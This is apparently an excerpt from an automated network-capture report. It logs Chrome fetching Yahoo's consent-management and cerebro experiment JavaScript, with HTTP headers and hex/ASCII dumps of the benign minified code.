                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC885INData Raw: 63 20 2e 57 68 73 5c 28 6e 77 5c 29 2c 2e 45 6c 6c 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 5c 24 73 72 63 68 48 6f 6d 65 54 6e 52 6f 77 5c 29 7b 77 69 64 74 68 3a 63 61 6c 63 28 35 30 25 20 2d 20 34 70 78 29 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 30 30 5c 25 5c 29 7b 77 69 64 74 68 3a 31 30 30 25 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 31 5c 2e 32 35 70 78 5c 29 7b 77 69 64 74 68 3a 31 31 2e 32 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 31 32 70 78 5c 29 7b 77 69 64 74 68 3a 31 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 32 70 78 5c 29 7b 77 69 64 74 68 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 36 35 70 78 5c 29 7b 77 69 64 74 68 3a 31 36 35 70 78 7d 23 61 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: c .Whs\(nw\),.Ell{white-space:nowrap}#atomic .W\(\$srchHomeTnRow\){width:calc(50% - 4px)}#atomic .W\(100\%\){width:100%}#atomic .W\(11\.25px\){width:11.25px}#atomic .W\(112px\){width:112px}#atomic .W\(12px\){width:12px}#atomic .W\(165px\){width:165px}#ato


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    44192.168.2.449804152.195.53.2004434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC537OUTGET /version/6.4.1/cmp.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: consent.cmp.oath.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC508INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 37176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "6863ce0703ce4f482389f8a7e640e4e6+gzip+ident"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Tue, 30 Sep 2025 17:20:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 08 Feb 2024 18:14:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ECD (lhc/78B7)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 1yk3gZ3kJJf0LVDtItD6POUlzFgaXI9p0h5fAdAS37IQggb82fK6hsi+PtZo5dB7x5ehkmLpVSI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: QVFPR19TF61H9XNC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 184464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC16383INData Raw: 2f 2a 21 20 43 4d 50 20 36 2e 34 2e 31 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 4f 61 74 68 20 48 6f 6c 64 69 6e 67 73 2c 20 49 6e 63 2e 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 34 31 38 34 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 28 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /*! CMP 6.4.1 Copyright 2018 Oath Holdings, Inc. */!function(){var e={4184:function(e){"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1INData Raw: 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: =
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC16383INData Raw: 73 7d 2c 35 31 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 43 6f 6d 6d 61 6e 64 3d 76 6f 69 64 20 30 3b 74 2e 43 6f 6d 6d 61 6e 64 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 6e 29 7b 74 68 69 73 2e 73 75 63 63 65 73 73 3d 21 30 2c 74 68 69 73 2e 63 6d 70 41 70 69 43 6f 6e 74 65 78 74 3d 65 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 68 69 73 2c 7b 63 61 6c 6c 62 61 63 6b 3a 74 2c 70 61 72 61 6d 65 74 65 72 3a 6e 7d 29 7d 65 78 65 63 75 74 65 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 73 70 6f 6e 64 28 29 7d 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s},5148:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.Command=void 0;t.Command=class{constructor(e,t,n){this.success=!0,this.cmpApiContext=e,Object.assign(this,{callback:t,parameter:n})}execute(){try{return this.respond()}c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC16383INData Raw: 6e 63 6f 64 61 62 6c 65 46 69 78 65 64 42 69 74 66 69 65 6c 64 3d 76 6f 69 64 20 30 3b 63 6f 6e 73 74 20 72 3d 6e 28 33 37 39 36 29 2c 69 3d 6e 28 37 34 30 29 3b 63 6c 61 73 73 20 6f 20 65 78 74 65 6e 64 73 20 69 2e 41 62 73 74 72 61 63 74 45 6e 63 6f 64 61 62 6c 65 42 69 74 53 74 72 69 6e 67 44 61 74 61 54 79 70 65 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 6e 75 6d 45 6c 65 6d 65 6e 74 73 3d 65 2e 6c 65 6e 67 74 68 2c 74 68 69 73 2e 73 65 74 56 61 6c 75 65 28 65 29 7d 65 6e 63 6f 64 65 28 29 7b 72 65 74 75 72 6e 20 72 2e 46 69 78 65 64 42 69 74 66 69 65 6c 64 45 6e 63 6f 64 65 72 2e 65 6e 63 6f 64 65 28 74 68 69 73 2e 76 61 6c 75 65 2c 74 68 69 73 2e 6e 75 6d 45 6c 65 6d 65 6e 74 73 29 7d 64 65 63 6f 64 65 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ncodableFixedBitfield=void 0;const r=n(3796),i=n(740);class o extends i.AbstractEncodableBitStringDataType{constructor(e){super(),this.numElements=e.length,this.setValue(e)}encode(){return r.FixedBitfieldEncoder.encode(this.value,this.numElements)}decode(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC16383INData Raw: 45 72 72 6f 72 3d 6e 7d 2c 31 31 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 4c 61 7a 79 44 65 63 6f 64 69 6e 67 45 72 72 6f 72 3d 76 6f 69 64 20 30 3b 63 6f 6e 73 74 20 72 3d 6e 28 39 39 37 33 29 3b 63 6c 61 73 73 20 69 20 65 78 74 65 6e 64 73 20 72 2e 44 65 63 6f 64 69 6e 67 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 65 29 2c 74 68 69 73 2e 6e 61 6d 65 3d 22 4c 61 7a 79 44 65 63 6f 64 69 6e 67 45 72 72 6f 72 22 7d 7d 74 2e 4c 61 7a 79 44 65 63 6f 64 69 6e 67 45 72 72 6f 72 3d 69 7d 2c 34 35 30 34 3a 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Error=n},1104:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.LazyDecodingError=void 0;const r=n(9973);class i extends r.DecodingError{constructor(e){super(e),this.name="LazyDecodingError"}}t.LazyDecodingError=i},4504:funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC3INData Raw: 67 28 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: g()
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC16383INData Raw: 2c 6e 65 77 20 6f 2e 45 6e 63 6f 64 61 62 6c 65 46 6c 65 78 69 62 6c 65 42 69 74 66 69 65 6c 64 28 28 28 29 3d 3e 64 2e 67 65 74 56 61 6c 75 65 28 29 29 2c 5b 5d 29 29 2c 73 75 70 65 72 28 74 2c 5b 5b 70 2e 54 63 66 43 61 56 31 46 69 65 6c 64 2e 56 45 52 53 49 4f 4e 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 54 63 66 43 61 56 31 46 69 65 6c 64 2e 43 52 45 41 54 45 44 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 54 63 66 43 61 56 31 46 69 65 6c 64 2e 4c 41 53 54 5f 55 50 44 41 54 45 44 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 54 63 66 43 61 56 31 46 69 65 6c 64 2e 43 4d 50 5f 49 44 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 54 63 66 43 61 56 31 46 69 65 6c 64 2e 43 4d 50 5f 56 45 52 53 49 4f 4e 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 54 63 66 43 61 56 31 46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,new o.EncodableFlexibleBitfield((()=>d.getValue()),[])),super(t,[[p.TcfCaV1Field.VERSION.toString(),p.TcfCaV1Field.CREATED.toString(),p.TcfCaV1Field.LAST_UPDATED.toString(),p.TcfCaV1Field.CMP_ID.toString(),p.TcfCaV1Field.CMP_VERSION.toString(),p.TcfCaV1F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC16383INData Raw: 31 22 3a 72 3d 21 30 2c 6e 5b 31 5d 3d 69 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 63 2e 44 65 63 6f 64 69 6e 67 45 72 72 6f 72 28 22 55 6e 61 62 6c 65 20 74 6f 20 64 65 63 6f 64 65 20 73 65 67 6d 65 6e 74 20 27 22 2b 74 5b 65 5d 2b 22 27 22 29 7d 7d 74 68 69 73 2e 64 65 63 6f 64 65 53 65 67 6d 65 6e 74 73 46 72 6f 6d 42 69 74 53 74 72 69 6e 67 73 28 6e 29 2c 74 68 69 73 2e 66 69 65 6c 64 73 2e 67 65 74 28 61 2e 55 73 43 74 56 31 46 69 65 6c 64 2e 47 50 43 5f 53 45 47 4d 45 4e 54 5f 49 4e 43 4c 55 44 45 44 29 2e 73 65 74 56 61 6c 75 65 28 72 29 7d 67 65 74 49 64 28 29 7b 72 65 74 75 72 6e 20 6c 2e 49 44 7d 67 65 74 4e 61 6d 65 28 29 7b 72 65 74 75 72 6e 20 6c 2e 4e 41 4d 45 7d 7d 74 2e 55 73 43 74 56 31 3d 6c 2c 6c 2e 49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1":r=!0,n[1]=i;break;default:throw new c.DecodingError("Unable to decode segment '"+t[e]+"'")}}this.decodeSegmentsFromBitStrings(n),this.fields.get(a.UsCtV1Field.GPC_SEGMENT_INCLUDED).setValue(r)}getId(){return l.ID}getName(){return l.NAME}}t.UsCtV1=l,l.I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC16383INData Raw: 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 6e 3d 6f 2e 54 43 46 43 6f 6d 6d 61 6e 64 2e 41 44 44 5f 45 56 45 4e 54 5f 4c 49 53 54 45 4e 45 52 3b 69 66 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 75 69 6c 74 2d 49 6e 20 43 75 73 74 6f 6d 20 43 6f 6d 6d 6d 61 6e 64 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3a 20 55 73 65 20 22 29 2e 63 6f 6e 63 61 74 28 6f 2e 54 43 46 43 6f 6d 6d 61 6e 64 2e 47 45 54 5f 54 43 5f 44 41 54 41 2c 22 20 69 6e 73 74 65 61 64 22 29 29 3b 69 66 28 6e 3d 6f 2e 54 43 46 43 6f 6d 6d 61 6e 64 2e 52 45 4d 4f 56 45 5f 45 56 45 4e 54 5f 4c 49 53 54 45 4e 45 52 2c 6e 75 6c 6c 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: on(){function e(e){if(e){var n=o.TCFCommand.ADD_EVENT_LISTENER;if(null==e?void 0:e[n])throw new Error("Built-In Custom Commmand for ".concat(n," not allowed: Use ").concat(o.TCFCommand.GET_TC_DATA," instead"));if(n=o.TCFCommand.REMOVE_EVENT_LISTENER,null=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC16383INData Raw: 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 7d 72 28 65 2c 74 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 75 6c 6c 3d 3d 3d 74 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 29 3a 28 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 65 77 20 6e 29 7d 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 50 69 6e 67 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 38 34 38 38 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 74 3d 65 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 72 65 74 75 72 6e 20 74 2e 63 6d 70 4c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: );function n(){this.constructor=e}r(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)});Object.defineProperty(t,"__esModule",{value:!0}),t.Ping=void 0;var o=n(8488),s=function(e){function t(){var t=e.call(this)||this;return t.cmpL


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    45192.168.2.44980587.248.119.2514434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC847OUTGET /ybar/cerebro_min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: edge-mcdn.secure.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC693INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: WQGejgN41tc6ufHCfNJ4MbEzii/VsLjDeqq0dQ4V4Wq2d2KpE8MiuKJVuYu7Zy8Q6HORWKzG/EzRMYb6GAbwUQ==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: SXW3EE1JCN1B8H2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 08:02:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 05 May 2022 20:34:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "0ccb51bc1dd6980920da39e008a599e0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 5636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 33483
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 76 61 72 20 57 4f 52 4b 5f 53 45 52 56 45 52 3d 22 68 74 74 70 73 3a 2f 2f 65 64 67 65 2d 6d 63 64 6e 2e 73 65 63 75 72 65 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 79 62 61 72 2f 65 78 70 2e 6a 73 6f 6e 22 2c 54 49 4d 45 4f 55 54 3d 32 65 33 2c 43 65 72 65 62 72 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 75 70 6c 6f 61 64 54 79 70 65 3d 22 69 6e 64 69 76 69 64 75 61 6c 22 2c 74 68 69 73 2e 65 78 70 43 6f 75 6e 74 3d 30 2c 74 68 69 73 2e 70 65 6e 64 69 6e 67 3d 7b 7d 2c 74 68 69 73 2e 63 6f 6d 70 6c 65 74 65 3d 30 7d 72 65 74 75 72 6e 20 65 2e 72 75 6e 45 78 70 65 72 69 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6e 65 77 20 65 29 2e 5f 66 65 74 63 68 57 6f 72 6b 28 29 7d 2c 65 2e 73 65 6e 64 42 65 61 63 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: var WORK_SERVER="https://edge-mcdn.secure.yahoo.com/ybar/exp.json",TIMEOUT=2e3,Cerebro=function(){function e(){this.uploadType="individual",this.expCount=0,this.pending={},this.complete=0}return e.runExperiment=function(){(new e)._fetchWork()},e.sendBeaco
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 69 73 20 30 22 29 3b 65 6c 73 65 7b 69 66 28 6e 3e 3d 65 2e 65 78 70 4c 69 73 74 2e 6c 65 6e 67 74 68 29 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 6d 61 72 6b 65 64 20 61 6c 6c 20 65 78 70 65 72 69 6d 65 6e 74 73 20 74 6f 20 72 75 6e 20 61 73 20 65 78 70 43 6f 75 6e 74 20 3e 3d 20 65 78 70 4c 69 73 74 20 6c 65 6e 67 74 68 22 29 2c 72 3d 65 2e 65 78 70 4c 69 73 74 3b 65 6c 73 65 20 69 66 28 22 72 61 6e 64 6f 6d 22 3d 3d 3d 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 6d 61 72 6b 65 64 20 22 2b 6e 2b 22 20 72 61 6e 64 6f 6d 20 65 78 70 65 72 69 6d 65 6e 74 73 20 74 6f 20 72 75 6e 22 29 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 3b 69 2b 2b 29 7b 76 61 72 20 73 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 65 2e 65 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: is 0");else{if(n>=e.expList.length)console.log("marked all experiments to run as expCount >= expList length"),r=e.expList;else if("random"===t){console.log("marked "+n+" random experiments to run");for(var i=0;i<n;i++){var s=Math.floor(Math.random()*(e.ex
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 65 61 63 6f 6e 73 22 29 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 6e 64 42 65 61 63 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6d 3d 74 68 69 73 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 74 61 72 74 54 69 6d 65 3d 30 2c 74 68 69 73 2e 65 6e 64 54 69 6d 65 3d 30 2c 74 68 69 73 2e 73 6f 75 72 63 65 3d 22 64 65 66 61 75 6c 74 22 7d 2c 74 3d 30 2c 6f 3d 65 3b 74 3c 6f 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6f 5b 74 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 69 2c 73 2c 6f 2c 61 2c 75 2c 63 29 7b 76 61 72 20 6c 2c 70 2c 64 2c 66 2c 68 3b 30 3c 61 2e 6c 65 6e 67 74 68 7c 7c 30 3c 6f 2e 6c 65 6e 67 74 68 3f 28 70 3d 6e 65 77 20 6e 2c 64 3d 21 31 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eacons")}},e.prototype._sendBeacons=function(e){for(var m=this,n=function(){this.startTime=0,this.endTime=0,this.source="default"},t=0,o=e;t<o.length;t++){var r=o[t];!function(r,i,s,o,a,u,c){var l,p,d,f,h;0<a.length||0<o.length?(p=new n,d=!1,new Promise(f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 2c 66 7c 7c 65 28 29 7d 2c 68 2e 73 74 61 72 74 54 69 6d 65 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6f 2e 73 72 63 3d 72 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 22 69 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 29 7b 68 2e 65 6e 64 54 69 6d 65 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 68 2e 73 6f 75 72 63 65 3d 22 69 6d 61 67 65 22 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 4e 61 6d 65 28 72 29 3b 6d 2e 65 78 70 43 6f 75 6e 74 3d 31 3c 65 2e 6c 65 6e 67 74 68 3f 6d 2e 65 78 70 43 6f 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: clearTimeout(t),f||e()},h.startTime=Date.now(),o.src=r}).then(function(){if("performance"in window&&"getEntriesByType"in window.performance){h.endTime=Date.now(),h.source="image";var e=window.performance.getEntriesByName(r);m.expCount=1<e.length?m.expCoun
